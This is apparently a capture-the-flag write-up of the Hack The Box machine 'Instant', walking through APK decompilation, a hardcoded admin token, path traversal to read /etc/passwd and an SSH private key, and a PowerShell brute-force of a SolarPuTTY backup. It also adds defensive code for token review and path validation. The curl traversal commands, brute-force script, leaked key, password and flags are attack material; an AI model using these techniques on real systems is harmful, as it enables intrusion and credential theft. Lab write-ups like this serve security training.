Overview

Instant is a medium-difficulty machine from Hack The Box. It starts with decompiling an APK file, which exposes a new subdomain alongside a hardcoded Authorization token; that token eventually lets us leak an SSH private key and read the user flag. Finally, we decrypt an exposed SolarPuTTY backup file and find the root password stored in it.
Reconnaissance

```
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-14 22:51 Arabian Standard Time
NSOCK ERROR [0.2820s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 10.129.138.194
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3183eb9f15f840a5049ccb3ff6ec4976 (ECDSA)
|_  256 6f6603470e8ae00397675b41cfe2c7c7 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
|_http-title: Did not follow redirect to http://instant.htb/
|_http-server-header: Apache/2.4.58 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=10/14%OT=22%CT=1%CU=43149%PV=Y%DS=2%DC=T%G=Y%TM=670D68
OS:54%P=i686-pc-windows-windows)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=
OS:A)SEQ(CI=Z%II=I)SEQ(SP=101%GCD=1%ISR=102%TI=Z%CI=Z%TS=9)OPS(O1=M54EST11N
OS:W7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54ES
OS:T11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=4
OS:0%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(
OS:R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   129.00 ms 10.10.16.1
2   257.00 ms 10.129.136.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.08 seconds
```
We can see that we have our usual SSH port alongside a web app on port 80 that redirects us to instant.htb, so let’s go ahead and add that entry to our /etc/hosts file.
Web App
Right away, we can see that we can download an APK file. Let’s download it and decompile it using jadx to check what we have.
Mobile Application - instant.apk

Checking the source code, especially AdminActivities, we can find a hardcoded admin Authorization token tied to a mywalletv1.instant.htb subdomain.
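Before relying on a token found inside a client app, it is worth seeing what it actually asserts. The following is an added example of mine, not code from the original write-up or from the box: it decodes the header and claims of the Authorization token recovered from AdminActivities using only the Python standard library and lists the properties that make a token shipped inside an APK a finding (symmetric HS256 signing, an Admin role, and an exp so far in the future that the token never effectively expires). Signature verification is deliberately not attempted, since the signing secret lives on the server and is not on this page.

```python
import base64
import json
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Tuple

# Authorization header value recovered from AdminActivities in the decompiled APK (taken from the write-up).
HARDCODED_ADMIN_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ."
    "v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
)


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url with the '=' padding stripped; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> Tuple[Dict, Dict]:
    """Return (header, claims) WITHOUT checking the signature.

    This only shows what the token asserts about its bearer; it proves nothing
    about whether the server would accept it.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a three-part JWS compact token")
    header = json.loads(_b64url_decode(parts[0]))
    claims = json.loads(_b64url_decode(parts[1]))
    return header, claims


def expiry_of(claims: Dict) -> datetime:
    # Plain arithmetic from the epoch, so an exp far beyond the platform's time_t range still works.
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=int(claims["exp"]))


def review_token(token: str, now: Optional[datetime] = None) -> List[str]:
    """List the properties that turn a token embedded in a client app into a finding."""
    now = now or datetime.now(timezone.utc)
    header, claims = decode_jwt_unverified(token)
    findings = []
    alg = str(header.get("alg", ""))
    if alg.upper().startswith("HS"):
        findings.append(f"symmetric signature ({alg}): every verifier holds the secret needed to mint tokens")
    if str(claims.get("role", "")).lower() == "admin":
        findings.append("token carries an administrative role")
    if "exp" not in claims:
        findings.append("no expiry claim: the token never expires")
    else:
        remaining = expiry_of(claims) - now
        if remaining > timedelta(days=365):
            findings.append(
                f"expires {expiry_of(claims).date()}, about {remaining.days // 365} years away: "
                "effectively a permanent credential"
            )
    return findings


if __name__ == "__main__":
    hdr, body = decode_jwt_unverified(HARDCODED_ADMIN_TOKEN)
    print("header:", hdr)
    print("claims:", body)
    for finding in review_token(HARDCODED_ADMIN_TOKEN):
        print("-", finding)
```

Run it and the claims come out as id 1, role Admin and an exp in the year 3023; the three findings it prints are exactly why a static admin token in a shipped app is a critical defect rather than a convenience, and they are what a build-time secret scan over the decompiled smali and resources should be flagging.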
I’ll also look for more subdomains by using apktool to get a closer look at the source code:

```
┌──(kali㉿kali)-[~/Desktop/instant]
└─$ grep -iR instant.htb
res/xml/network_security_config.xml:        <domain includeSubdomains="true">mywalletv1.instant.htb</domain>
res/xml/network_security_config.xml:        <domain includeSubdomains="true">swagger-ui.instant.htb</domain>
res/layout/activity_forgot_password.xml:    <TextView android:textSize="14.0sp" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_margin="25.0dip" android:text="Please contact [email protected] to have your account recovered" android:fontFamily="sans-serif-condensed" android:textAlignment="center" />
smali/com/instantlabs/instant/LoginActivity.smali:    const-string v1, "http://mywalletv1.instant.htb/api/v1/login"
smali/com/instantlabs/instant/ProfileActivity.smali:    const-string v7, "http://mywalletv1.instant.htb/api/v1/view/profile"
smali/com/instantlabs/instant/AdminActivities.smali:    const-string v2, "http://mywalletv1.instant.htb/api/v1/view/profile"
smali/com/instantlabs/instant/TransactionActivity$2.smali:    const-string v1, "http://mywalletv1.instant.htb/api/v1/confirm/pin"
smali/com/instantlabs/instant/TransactionActivity.smali:    const-string v0, "http://mywalletv1.instant.htb/api/v1/initiate/transaction"
smali/com/instantlabs/instant/RegisterActivity.smali:    const-string p4, "http://mywalletv1.instant.htb/api/v1/register"
```
We can see that we also have a swagger-ui.instant.htb subdomain, so let’s add those two to our /etc/hosts file.
Taking a look at the exposed Swagger API, we can see a lot of endpoints.
One fairly interesting endpoint was /api/v1/admin/read/log, which takes a log_file_name parameter.
Let’s make a request to that endpoint with our previously acquired Authorization token and try to read local files:
```
┌──(kali㉿kali)-[~]
└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=../../../../../../../etc/passwd" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
{"/home/shirohige/logs/../../../../../../../etc/passwd":["root:x:0:0:root:/root:/bin/bash\n","daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n","bin:x:2:2:bin:/bin:/usr/sbin/nologin\n","sys:x:3:3:sys:/dev:/usr/sbin/nologin\n","sync:x:4:65534:sync:/bin:/bin/sync\n","games:x:5:60:games:/usr/games:/usr/sbin/nologin\n","man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n","lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n","mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n","news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n","uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n","proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n","www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n","backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n","list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n","irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n","_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\n","nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n","systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin\n","systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin\n","dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false\n","messagebus:x:101:102::/nonexistent:/usr/sbin/nologin\n","systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin\n","pollinate:x:102:1::/var/cache/pollinate:/bin/false\n","polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin\n","usbmux:x:103:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\n","sshd:x:104:65534::/run/sshd:/usr/sbin/nologin\n","shirohige:x:1001:1002:White Beard:/home/shirohige:/bin/bash\n","_laurel:x:999:990::/var/log/laurel:/bin/false\n"],"Status":201}
```
And yes, we get a hit! Now let’s try to read the user’s id_rsa private key:
```
┌──(kali㉿kali)-[~]
└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=../../../../../../../home/shirohige/.ssh/id_rsa" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
{"/home/shirohige/logs/../../../../../../../home/shirohige/.ssh/id_rsa":["-----BEGIN OPENSSH PRIVATE KEY-----\n","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\n","-----END OPENSSH PRIVATE KEY-----\n"],"Status":201}
```
And yes, we can read it! Let’s clean it up and get our SSH session:
```
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
```
```
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa [email protected]
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
shirohige@instant:~$ cat user.txt
444dc5a4a564078744b54c37dbda9316
shirohige@instant:~$
```
And we get our user flag!
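The foothold above works because the log_file_name parameter is joined straight onto /home/shirohige/logs, which the API’s own response path ("/home/shirohige/logs/../../../../../../../etc/passwd") gives away. As an added example of mine, not the box’s code (the fixture directory and file names are constructed here), this Python snippet puts a reader with that behaviour next to a hardened version that accepts only a bare file name and checks that the resolved path still lies inside the log directory:

```python
import os
import tempfile

# Constructed fixture: a throwaway tree standing in for /home/shirohige/logs (LOG_DIR)
# and for a sensitive file that lives outside it.
ROOT = tempfile.mkdtemp(prefix="instant-readlog-")
LOG_DIR = os.path.join(ROOT, "logs")
os.mkdir(LOG_DIR)
with open(os.path.join(LOG_DIR, "app.log"), "w") as fh:
    fh.write("2024-10-14 22:51:00 INFO login ok\n")
with open(os.path.join(ROOT, "outside.txt"), "w") as fh:
    fh.write("not a log file\n")


def read_log_vulnerable(log_file_name: str) -> list:
    """Join the parameter onto the log directory and open whatever that yields.

    This mirrors what the API's response path reveals about the box: '..' segments
    walk out of the directory, and an absolute name makes os.path.join drop LOG_DIR
    entirely.
    """
    with open(os.path.join(LOG_DIR, log_file_name)) as fh:
        return fh.readlines()


def read_log_hardened(log_file_name: str) -> list:
    """Same contract, but only a bare file name that resolves inside LOG_DIR is served."""
    # 1. Syntactic check before touching the filesystem: not empty, no '.'/'..', no separators.
    if (not log_file_name
            or log_file_name in (".", "..")
            or os.path.basename(log_file_name) != log_file_name):
        raise ValueError("log_file_name must be a bare file name")
    # 2. Semantic check after resolving symlinks: the final path must still sit under LOG_DIR.
    base = os.path.realpath(LOG_DIR)
    candidate = os.path.realpath(os.path.join(base, log_file_name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the log directory")
    with open(candidate) as fh:
        return fh.readlines()


def is_rejected(log_file_name: str) -> bool:
    """True when the hardened reader refuses the name (handy for comparing both readers)."""
    try:
        read_log_hardened(log_file_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable, ../outside.txt ->", read_log_vulnerable("../outside.txt"))
    print("hardened,   ../outside.txt -> rejected:", is_rejected("../outside.txt"))
    print("hardened,   app.log ->", read_log_hardened("app.log"))
```

The two checks are deliberately layered: the basename test stops traversal and absolute paths before any filesystem call, and the realpath/commonpath test catches a symlink inside the log directory that points elsewhere. On the detection side, a request whose log_file_name contains a path separator or ".." is never legitimate for this endpoint and is a cheap thing to alert on in the web server or application logs.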
Privilege Escalation - SolarPuTTY Session Decryption

Looking at what we have access to, we find a sessions-backup.dat file under /opt/backups/Solar-PuTTY, which is a SolarPuTTY session backup. There’s an amazing tool for this named SolarPuttyDecrypt, so I wrote a small PowerShell script around it to brute-force the decryption of our PuTTY session backup:
```powershell
$rockyouPath      = "C:\Users\0xkujen\Desktop\HackThebox\HTB_Machines\Instant\rockyou.txt"
$decryptExePath   = "SolarPuttyDecrypt_v1/SolarPuttyDecrypt.exe"
$sessionsFilePath = "sessions-backup.dat"

function Invoke-SolarPuttyBruteforce {
    # Try every wordlist entry as the backup password; the decrypter prints the result itself.
    Get-Content -Path $rockyouPath | ForEach-Object {
        $password = $_.Trim()
        try {
            & $decryptExePath $sessionsFilePath $password
        } catch {
            Write-Output "Error: $_"
        }
    }
}

Invoke-SolarPuttyBruteforce
```
We execute it and wait for some time:
```
-----------------------------------------------------
SolarPutty's Sessions Decrypter by VoidSec
-----------------------------------------------------
{
  "Sessions": [
    {
      "Id": "066894ee-635c-4578-86d0-d36d4838115b",
      "Ip": "10.129.138.194",
      "Port": 22,
      "ConnectionType": 1,
      "SessionName": "Instant",
      "Authentication": 0,
      "CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
      "AuthenticateScript": "00000000-0000-0000-0000-000000000000",
      "LastTimeOpen": "0001-01-01T00:00:00",
      "OpenCounter": 1,
      "SerialLine": null,
      "Speed": 0,
      "Color": "#FF176998",
      "TelnetConnectionWaitSeconds": 1,
      "LoggingEnabled": false,
      "RemoteDirectory": ""
    }
  ],
  "Credentials": [
    {
      "Id": "452ed919-530e-419b-b721-da76cbe8ed04",
      "CredentialsName": "instant-root",
      "Username": "root",
      "Password": "12**24nzC!r0c%q12",
      "PrivateKeyPath": "",
      "Passphrase": "",
      "PrivateKeyContent": null
    }
  ],
  "AuthScript": [],
  "Groups": [],
  "Tunnels": [],
  "LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}
-----------------------------------------------------
[+] DONE Decrypted file is saved in: C:\Users\0xkujen\SolarPutty_sessions_decrypted.txt
```
And we get our root password! Let’s get our root flag now:
```
root@instant:~
90620fd97392d21c28b2309bfa1dac09
root@instant:~
```
And that was it for Instant, hope you learned something new!
-0xkujen